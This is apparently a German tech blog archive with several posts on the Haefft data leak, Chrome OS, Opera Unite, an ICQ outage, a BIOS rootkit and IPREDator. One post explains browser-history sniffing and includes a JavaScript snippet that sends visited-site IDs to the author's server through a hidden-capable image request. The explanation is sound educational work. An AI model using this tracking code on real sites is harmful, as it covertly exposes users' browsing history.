Mit Sicherheit hat schon jeder mitbekommen, was beim sozialen Netzwerk von Haefft passiert ist. Deswegen nur kurz zusammengefasst:
Der CCC hat im Sozialen Netzwerk von Haefft schwerwiegende Sicherheitslücken gefunden, die kaum zu übertreffen sind. Die Daten aller dort angemeldeten Schüler waren für jeden, der die Sicherheitslücke entdeckt hat, frei zugänglich.
Konkret hat es sich um folgende Schwachstellen gehandelt:
Passwörter wurden im Klartext in der Datenbank gespeichert. Nicht als Hash und somit natürlich auch ohne Salt.
Keine verschlüsselte Anmeldung. D.h. Username und Passwort wurden unverschlüsselt über das Internet übertragen
Eingabedaten wurden ungefiltert an die Datenbank übertragen.
Doch das waren noch nicht genug Anfängerfehler. Jetzt kommt, wie ich finde, der eigentliche Hammer:
Passwörter wurden mit dem ILIKE-Operator überprüft.
Zudem wurden sie [die Passwörter] mit dem ILIKE-Operator nur auf Ähnlichkeit verglichen, so daß sich die Paßwort-Abfrage mit einfachsten Mitteln umgehen ließ.
Wie die Überprüfung genau stattgefunden hat, weiß ich natürlich nicht. Ich kenne deren Quelltext nicht. Aber man möge sich nur mal vorstellen, was die Programmierer sich bei der Passwort-Abfrage gedacht haben:
“Wenn der Nutzer ein Passwort eingibt, was so oder so ähnlich aussieht, wie das was wir unverschlüsselt in der Datenbank gespeichert haben, dann ist er erfolgreich authentifiziert.”
Ja, wie kommt man denn darauf? Authentifizierung mit Hilfe von Wahrscheinlichkeiten?
“Authentifiziere dich mit dem User aus der unverschlüsselten Datenbank, der dem eingegebenen Datensatz am ehesten entspricht.” Oder was?
Ernsthaft, wie kommt man auf die Idee ein Passwort mit einem ILIKE zu überprüfen? Gibt es da evtl. sinnvolle Einsatzzwecke, die ich nicht kenne? Ich bezweifle es.
Der CCC frägt sich, angesichts der immer wiederkehrenden Datenskandale, zurecht inwiefern und ob man überhaupt sozialen Netzwerken sein Vertrauen schenken darf. Haefft verliert jetzt hoffentlich all seine Nutzer.
Es ist da, das Betriebssystem von Google. Chromium OS.
Ich will keinen Seitenlangen Blogpost schreiben. Das werden, spätestens morgen, viele Blogger und Newsseiten erledigen Hier nur einige wichtige Stichworte:
Chrome OS bootet in sagenhaften 7 Sekunden (Auf welchem System wurde nicht gesagt)
Der User kann keine Programme installieren
Chrome OS hat eine nicht-beschreibbare root-Partition
für User-Daten wird eine verschlüsselte Partition angelegt
User-Einstellungen werden in die Cloud synchronisiert: Wlan-Einstellungen, Systemeinstellungen, Hintergrund, Lesezeichen,… Hat zur Folge: Man loggt sich an einer anderen Chrome OS-Maschine an und die Einstellungen passen. Die lokale Speicherung der Daten wird nur also nur als Cache genutzt.
vollständig Open Source
… uvm
Was Chrome OS genau ist, kann man sich im Webcast anschauen:
Heute wollte Opera das Web neu erfinden. Das Web selbst haben sie nicht neu erfunden, allerdings einen Browser vorgestellt der nicht nur Client sondern auch Webserver sein kann.
Der Dienst, der diesen Server bereitstellt heißt Opera Unite Server und kann, in einer speziellen Version, unter „Tools“ => „Opera Unite Server“ aktiviert werden. Anschließend erscheint ein Wizard, der eine Grundeinstellung vornimmt.
Nachdem die erste Konfiguration ausgeführt wurde, können in der Sidebar per Doppelklick Anwendungen aktiviert werden. Opera liefert einige mit:
Filesharing: Dateien tauschen
Fridge: Notizzettel hinterlassen
Media Player: Streaming-Client
Photo Sharing: is klar, oder?
The Lounge: Chat
Web Server: Eigene Webseiten bereitstellen
Über einen Button (Add) können zusätzliche Plugins von der Opera-Homepage hinzugefügt werden.
Man kann für jeden Computer einen Computernamen angeben. Über die URL ComputerName.Username.operaunite.com kann man anschließend auf Unite zugreifen.
Die Anwendungen und auch Unite selbst sind äußerst einfach zu konfigurieren. Bei der Erstkonfiguration kann man auswählen, ob UPnP ein Destination-NAT einrichten soll. („Use UPnP Port Forwarding from my router“, hab ich noch nich probiert). Falls dieser Punkt ausgewählt wird versucht Opera dem Router über UPnP klar zu
machen, dass er alle Verbindungen, die bei ihm an Port 8840 ankommen, zu Unite weiterleiten soll. Bei erfolgreicher Konfiguration ist Opera Unite also aus dem Internet über Port 8840 erreichbar. D.h. jeder Unite-Teilnehmer kann direkt zugreifen.
Wählt man, wie hier in dem Bild, diese Option nicht aus, helfen Operas Server eine Verbindung aufzubauen: Alle Daten wandern dann über die eine Art Proxyserver, die bei Opera stehen. D.h. Client und Unite bauen eine Verbindung zu diesem Unite Proxy auf. Wenn der Client eine Datei anfrägt, lädt der Unite diese zum Proxy hoch. Dieser stellt dann anschließend die Daten dem Client zur Verfügung.
Hier ist allerdings zu beachten, dass Opera einen Datenkanalauf Port 16680 TCP öffnet. Darüber werden dann die Daten vom Unite Server zum Proxy geschickt. (Das ist eine Vermutung von mir, habe keine offiziellen Quellen gefunden). Ohne offenen Port 16680, kann kein Client auf Unite zugreifen.
*UPDATE* Falls jemand Unite wirklich einsetzen will, sollte er auf die zweite Variante zurückgreifen. Einen Port auf einen Rechner im LAN weiterleiten sollte man, wenn nicht unbedingt nötig, vermeiden. *UPDATE*
Opera selbst schreibt in der Unite FAQ, dass keinerlei Informationen außerhalb des Kontrollbereiches des Users gespeichert werden:
Opera Unite technology resides in the Opera browser. No data is stored on servers outside your control. For connections, if UPnP (Universal Plug and Play) is not available, some server-side Opera technology will aid in establishing a connection between users
Positiv ist anzumerken, dass die meisten Dienste von Haus aus mit einem Zufallspasswort geschützt sind. Nicht ganz so gut: Alle User haben das gleiche Passwort. D.h. will man einen User aussperren, muss allen anderen das neue Passwort mitgeteilt werden.
Wie sollte es auch anders sein. Die ersten dieser Passwörter sind schon bei Google gelistet.
Der Googledork für Opera Unite-Anbieter, die Ihr Passwort schon im Internet “bekannt gemacht” haben:
Wo ich wirklich Potential sehe, ist das Plugin “Media Player”. Damit können Musikdateien spielend einfach für alle per Stream zur Verfügung gestellt werden. Das Plugin sollte sich bitte mal jemand für Google Wave vormerken!
Manche haben es vielleicht schon gemerkt – manche ICQ-User kommen seit Sonntag nicht mehr in Ihren ICQ-Account.
Es sieht es so aus, als würden die Authentifizierungsserver funktionieren. Beim laden / abgleichen der Kontaktliste scheint es Probleme zu geben.
Wenn man davon ausgeht, dass AOL mehr als einen Server für ICQ zur Verfügung stellt, scheinen also nur spezielle Server und nur einige ICQ-Ranges betroffen zu sein.
Man hört von allen Nummern die mit einer 1* beginnen. (dazu darf ich mich zählen). Es melden aber auch einige, die nur eine 3* (haha!) als 1. Ziffer haben, Probleme beim einloggen.
AOL ist wie gewohnt träge. Im “Supportforum” von ICQ (support.icq.com) finden sich inzwischen immer mehr User ein, die auf eine Reaktion von AOL warten. AOL hat die Prioritäten aber anders verteilt:
CDs mit günstigen Modem-Tarifen pressen
Boris – “Bin bin ich schon drin?”- Becker einen neuen Werbespruch beibringen
ICQ-Server wieder hochfahren
Dass Punkt 2 einige Zeit in Anspruch nimmt verstehen doch alle?
Gestern wurde ich von @tslg auf die Webseite www.startpanic.com hingewiesen. Nach einem Klick auf “Lets Start” findet die Webseite plötzlich Seiten, die man während dem surfen besucht hat. Erstaunlich und und wirkungsvoll. Man will gleich die Petition unterschreiben:
We are gathering petition signatures with the request to patch the privacy vulnerabilities of web different web browsers. This petition will be sent to the four major development companies – Mozilla Corp., Apple inc., Microsoft Corp. and Opera Software ASA. Join us for a safe and secure Internet!
Doch was passiert im Hintergrund, wie kommt die Webseite an die Daten? Eine unbekannte Sicherheitslücke in allen Browsern? Nicht wirklich.
Die Idee dahinter ist gut und die Webseite ist auch interessant umgesetzt. Da aber keinerlei Informationen über die Funktionsweise auf der Webseite stehen, hab ich mir das JavaScript, was im Hintergrund vom Browser ausgeführt wird, mal genauer angesehen.
Dieses Javascript ist ziemlich aufwendig und man braucht einige Zeit bis man es vollständig nachvollzogen hat… vor allem wenn man, wie ich, kein Javascript-Nerd ist.
Nachdem ich das Prinzip verstanden hatte, hab ich einen eigenen Code geschrieben. Der ist deutlich kürzer, arbeitet aber ähnlich.
In der itblogger.js sind 2 Javascript-Funktionen zu finden, die die Auswertung Informationen machen.
Die erste Funktion heißt writeURL(). Diese Funktion greift auf das Array “urls” zu und schreibt nacheinander Links zu den den Webseiten, die in diesem Array stehen, auf die Testwebseite. Zusätzlich wird jeder einzelne Link mit einer eindeutigen ID versehen. D.h. google.de hat die ID 0, it-blogger.net hat die ID 1,… playboy.de hat die ID 4.
Diese Links werden über die style.css unterschiedlich formatiert. Bereits besuchte Webseiten werden grün angezeigt, nicht besuchte Webseiten werden rot angezeigt. D.h. playboy.de wird wahrscheinlich grün sein, spiegel.de rot.
Das ist bisher nichts besonderes. Diese Funktion findet man auf vielen verschiedenen Webseiten und Links werden ja sowieso immer unterschiedlich angezeigt.
Bei der zweiten Funktion wird es interessant. checkState() geht die vorher erstellten Links durch und schaut ob diese grün oder rot dargestellt werden. Das passiert in diesem Codeabschnitt:
1: var besuchteseiten = “”;
2: for(var i = 0; i<urls.length;i++){
3: var besucht = window.getComputedStyle(document.getElementById4(i),”" ).getPropertyValue(“color”);
Über die Funktion getComputedStyle() (Z. 3) wird überprüft, wie der Browser den Link gerade anzeigt (rot oder grün) . Dazu wählt die Funktion über getElementById() die Links (wir hatten Sie ja mit einer ID versehen) nacheinander aus und überprüft ob die Eigenschaft “color”gleich rgb(0, 128, 0) (also grün) ist.
Wenn dies der Fall ist, schreibt die Funktion “id=x” (x steht für die jeweilige ID der Webseite) in die Variable “besuchteseiten“. Wenn mehrere Webseiten der Liste besucht wurden, werden diese zusammengesetzt in der Varaible gespeichert. Also id=0&id=2,… Außerdem wird ein neues Element unter “Besuchte Seiten” hinzugefügt.
Nachdem alle Webseiten überprüft und gelistet wurden, erzeugt die Funktion ein Bild:
1: div = document.getElementById(‘besucht’);
2: var img = document.createElement(“img”);
3: img.setAttribute(“src”,”http://www.it-blogger.net/files/jsinfogath/get.php?”+besuchteseiten);
4: 5: div.appendChild(img);
Dieses Bild hat als Quelle (Z 3) http://www.it-blogger.net/files/jsinfogath/get.php? und den String aus besuchten Webseiten:
In diesem wurden also die Webseiten mit der ID 1 und 4 vom Client besucht. D.h. google.de und winfuture.de.
Dieses Bild versucht der Browser aufzurufen. Erfolglos, denn es gibt das Bild ja nicht. Über den versuchten Aufruf haben wir aber die Informationen über die vom Client besuchten Webseiten, zu einem Server transportiert und könnten diese auf Serverseite weiterverarbeiten. In diesem Beispiel hier passiert auf Serverseite natürlich nichts!
Man kann natürlich auch das Bild verstecken – dann würde nichtmal der Platzhalter angezeigt werden. (siehe auskommentierte Zeile im Skript).
Auf startpanic.com wird eine etwas größere Datenbank für die Ermittlung der Webseiten verwendet:
Das sorgt natürlich für ein besseres Ergebnis. Um alles im Hintergrund zu überprüfen nutzt Startpanic kleine iframes, in die die jeweiligen Links eingebettet und danach überprüft werden. Ingesamt sieht die Startpanic-Version natürlich viel spektakulärer aus – es fehlt aber leider der technische Hintergrund. Das wurde hiermit erledigt
TecChannel bietet heute ein Osterspecial an: D.h. es gibt 10 Artikel kostenlos als PDF zum Download. Interessant dürfen die PDFs für Leute sein, die das ständige “Seite wechseln” bei TecChannel nervt.
Forscher von Core Security haben ein Rootkit geschrieben, welches sich per Update bzw. Flash des Bios aus dem Betriebssystem heraus ins Bios schreiben kann.
Grundsätzlich ist das nichts neues. Was dieses Rootkit so außergewöhnlich macht ist die Tatsache, dass es betriebssystemübergreifend (die Forscher nennen OpenBSD und Windows) die Kontrolle über das Betriebssystem übernehmen kann. Selbst virtuelle Maschinen können infiziert werden.
Diese Art von Rootkits sind deshalb so gefährlich, weil keine Formatierung der Festplatte dem Rootkit etwas anhaben kann. Das Rootkit kommt ohne eine Installation auf der Festplatte aus. Es installiert sich im Bios-Flash und wird deswegen noch vor dem Betriebssystem beim Systemstart geladen. Aus diesem Grund lassen sich natürlich AntiViren-Programme und ähnliche Programme leicht deaktivieren oder modifizieren.
Weiterverbreiten kann sich das Rootkit auch problemlos – die Forscher nennen hier die Möglichkeit den Bios-Networkstack zu nutzen, um weitere Rechner zu infizieren.
Einen anderen passenden Artikel, über das Vertrauen in unsere Hardware, hat Joanna Rutkowska vom Invisible Things Lab letzte Woche geschrieben (ein Auszug):
A quick summary in case you get lost already:
On most systems we are not protected against hardware backdoors, e.g. in the network card controller.
New technologies, e.g. Intel VT-d, can allow to protect against potentially malicious hardware (requires specially designed OS, e.g. specially configured Xen)…
… except for the potential backdoors in the processor.
If we don’t trust Microsoft, why should we trust Intel or AMD?
Man darf gespannt sein, wie sich diese Art von Malware entwickeln wird. Vielleicht brauchen wir irgendwann einen preboot-AntiVirus Programm. Wahrscheinlich wird in den Testlabors schon was passendes entwickelt…
IPREDator is a network service that makes people online more anonymous using a VPN. it costs about 5 EUR a month and we store no traffic data.
our service is right now in a beta stage. we hope it will be released for the public before 1st of april. sign up now to start using it as soon as we’re stable.
the network is under our control. not theirs. the pirate bay likes and knows real kopimism. and waffles.
IPREDator ist ein von The Pirate Bay angebotener Service der es den Nutzern ermöglichen soll, anonym im Internet zu surfen. Da, wie ihr oben lesen könnt, keine Traffic-Daten gespeichert werden, bleiben auf den Servern also keine Logs. Überprüfen kann das natürlich niemand.
Momentan kann man sich zur Beta-Phase anmelden. Ab ersten April soll die Phase abgeschlossen sein und der Dienst online gehen. Für 5 Dollar soll es einen VPN-Account zu kaufen geben.
Es gab und gibt ja einige Dienste die diesen Service auch schon angeboten hatten. Einige sind an den immensen Traffic-Kosten eingegangen. Bleibt zu hoffen, dass es The Pirate Bay nicht so ergehen wird.
Der Name ist übrigens an IPRED, der Europäische Richtlinie zur Durchsetzung Geistiger Eigentumsrechte, angelehnt. Diese wurde glaube ich zuletzt in Schweden verabschiedet. Damit ist es den Besitzern von geistigen Eigentums möglich die Daten von Usern bei den Providern direkt zu erfahren… Eigentlich unglaublich. Aber da es ne Richtlinie ist, könnte es uns hier auch irgendwann so treffen. Vielleicht formt sich hier dann ähnlicher Widerstand…
Hier nur einige wichtige Stichworte:
